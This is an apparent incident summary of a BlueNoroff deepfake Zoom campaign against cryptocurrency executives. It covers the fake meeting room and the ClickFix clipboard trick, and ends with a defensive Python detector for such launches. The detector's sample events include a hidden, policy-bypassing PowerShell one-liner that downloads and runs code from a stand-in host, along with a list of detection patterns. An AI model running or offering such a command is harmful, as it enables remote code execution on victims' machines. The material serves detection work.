BlueNoroff Deepfake Zoom Attack: 100 Crypto CEOs Compromised
A BlueNoroff deepfake Zoom campaign compromised over 100 cryptocurrency executives and Web3 founders using AI-generated deepfakes and clipboard injection.
- Incident date: Apr 2026
- Target: Cryptocurrency executives and Web3 founders
In April 2026, a report revealed that a sophisticated deepfake campaign had compromised over 100 cryptocurrency executives and Web3 founders.
What happened
The attack, attributed to BlueNoroff, used a fake Zoom meeting to achieve full system compromise in under five minutes. The attackers combined AI-generated deepfake participants with a technique called ClickFix clipboard injection. Months before the attack, the victim would receive a Calendly invite from an attacker posing as a legal professional; the invite's Google Meet link was replaced with a typo-squatted Zoom URL. The fake Zoom meeting room was populated with stolen webcam footage from prior victims, AI-generated still images, and deepfake composite videos. The attack exfiltrated the victim's webcam feed and used a fake update overlay to inject a malicious PowerShell command via the clipboard, which the victim was prompted to paste and run. This resulted in a persistent command-and-control (C2) implant and the deployment of several post-exploitation modules, including credential stealers and a Telegram session hijacker.
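The ClickFix step described above leaves a recognisable trace in endpoint telemetry: a script interpreter started by the user's shell (the Run dialog, for example) with a command line that hides its window and fetches remote content. The following detector is an added example written for this page, not code from the report or from any vendor; it assumes process-creation events with Image, ParentImage and CommandLine fields (Sysmon Event ID 1 or an EDR equivalent), and the sample events, the token list and the scoring threshold are all constructed assumptions for illustration.

```python
"""Heuristic detector for ClickFix-style 'paste this command and run it' executions.

Assumes process-creation telemetry with Image / ParentImage / CommandLine fields
(Sysmon Event ID 1 or an EDR equivalent). Field names, sample events, token
patterns and the threshold are constructed for this example.
"""
import re

# Interpreters a fake "update" overlay typically tells the victim to paste into.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
# Parents typical of a human pasting into Win+R or a shell, rather than a scheduled
# task or an installer (assumption: explorer.exe owns the Run dialog).
INTERACTIVE_PARENTS = {"explorer.exe"}
# Command-line traits that, combined, characterise a clipboard-delivered one-liner.
SUSPICIOUS_TOKENS = [
    (r"(?i)(^|\s)-(w|win|windowstyle)\s+hidden", "hidden window"),
    (r"(?i)(^|\s)-(e|ec|enc|encodedcommand)(\s|$)", "encoded command"),
    (r"(?i)\biex\b|invoke-expression", "invoke-expression"),
    (r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", "remote fetch"),
    (r"(?i)-nop\b|-noprofile", "no profile"),
    (r"(?i)bypass", "execution policy bypass"),
]

# Constructed sample events (not from the incident). Only the first is malicious.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -nop -ep bypass -c \"iex ((New-Object Net.WebClient)"
                    ".DownloadString('https://update.example.invalid/fix'))\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Users\dev\repo"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "cmd.exe /c dir"},
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "chrome.exe https://zoom.us"},
]


def basename(path):
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one process-creation event.

    Each matched trait adds one point; non-interpreter processes score zero.
    """
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "")
    reasons = []
    if image not in INTERPRETERS:
        return 0, reasons
    if parent in INTERACTIVE_PARENTS:
        reasons.append(f"{image} spawned by {parent} (Run dialog / shell paste)")
    for pattern, label in SUSPICIOUS_TOKENS:
        if re.search(pattern, cmd):
            reasons.append(label)
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=3):
    """Return events whose score reaches the threshold, with the matched reasons."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"CommandLine": ev.get("CommandLine", ""),
                         "score": score, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"score={hit['score']} reasons={hit['reasons']}")
        print(f"  {hit['CommandLine']}")
```

Scoring on several weak traits rather than alerting on any single one keeps routine developer and administrator PowerShell use (the second and third constructed events) below the threshold, while the clipboard-delivered one-liner trips five or six of them at once. In production the parent list should be tuned to the environment, and the Run dialog path can be corroborated with the RunMRU registry value that Windows writes for each Win+R command.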